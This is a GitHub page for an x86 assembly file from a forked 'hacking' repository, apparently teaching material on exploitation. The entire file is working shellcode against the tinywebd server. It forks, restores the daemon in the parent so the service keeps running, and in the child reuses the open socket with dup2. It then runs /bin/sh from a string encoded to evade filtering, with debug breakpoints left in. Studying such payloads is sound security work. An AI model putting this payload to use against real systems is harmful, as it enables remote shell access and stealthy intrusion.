forked from shichao-an/hacking
-
Notifications
You must be signed in to change notification settings - Fork 0
/
encoded_sockreuserestore_dbg.s
49 lines (41 loc) · 1.66 KB
/
encoded_sockreuserestore_dbg.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
BITS 32
push BYTE 0x02 ; fork is syscall #2
pop eax
int 0x80 ; after the fork, in child process eax == 0
test eax, eax
jz child_process ; in child process spawn a shell
; in the parent process, restore tinywebd
lea ebp, [esp+0x68] ; restore EBP
push 0x08048fb7 ; return address
ret ; return
child_process:
; re-use existing socket
lea edx, [esp+0x5c] ; put the address of new_sockfd in edx
mov ebx, [edx] ; put the value of new_sockfd in ebx
push BYTE 0x02
pop ecx ; ecx starts at 2
xor eax, eax
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80 ; dup2(c, 0)
dec ecx ; count down to 0
jns dup_loop ; if the sign flag is not set, ecx is not negative
; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
push 0x056d7834 ; push "/sh\x00" encoded +5 to the stack
push 0x736e6734 ; push "/bin" encoded +5 to the stack
mov ebx, esp ; put the address of encoded "/bin/sh" into ebx
int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
push BYTE 0x8 ; need to decode 8 bytes
pop edx
decode_loop:
sub BYTE [ebx+edx], 0x5
dec edx
jns decode_loop
int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
xor edx, edx
push edx ; push 32-bit null terminator to stack
mov edx, esp ; this is an empty array for envp
push ebx ; push string addr to stack above null terminator
mov ecx, esp ; this is the argv array with string ptr
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])